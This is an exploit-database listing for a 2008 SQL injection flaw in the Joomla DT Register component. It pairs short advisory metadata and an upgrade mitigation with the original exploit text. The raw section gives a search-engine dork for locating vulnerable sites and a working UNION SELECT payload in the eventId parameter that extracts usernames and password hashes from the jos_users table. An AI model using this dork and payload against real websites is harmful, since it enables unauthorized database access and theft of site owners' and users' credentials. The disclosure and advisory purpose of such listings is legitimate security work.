Joomla Component DT Register Remote SQL injection

vendor:

DT Register

by:

His0k4

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: DT Register

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Joomla Component DT Register Remote SQL injection

A vulnerability in Joomla Component DT Register allows remote attackers to inject arbitrary SQL commands via the eventId parameter in a index.php?option=com_dtregister request.

Mitigation:

Upgrade to the latest version of Joomla Component DT Register

Source

Exploit-DB raw data:

/---------------------------------------------------------------\
\                                				/
/       Joomla Component DT Register Remote SQL injection       \
\                                				/
\---------------------------------------------------------------/


[*] Author    :  His0k4 [ALGERIAN HaCkeR]

[*] Dork      :  inurl:com_DTRegister eventId

[*] Vendor    :  http://www.dthdevelopment.com/components/dt-register.html

[*] POC        : http://[TARGET]/[Path]/index.php?option=com_dtregister&eventId={SQL}

[*] Example    : http://[TARGET]/[Path]/index.php?option=com_dtregister&eventId=-12 UNION SELECT concat(username,0x3a,password) FROM jos_users&task=pay_options&Itemid=138

[*] Greetings  : All friends & muslims HaCkeRs
                 www.dz-secure.com
          
----------------------------------------------------------------------------

# milw0rm.com [2008-07-16]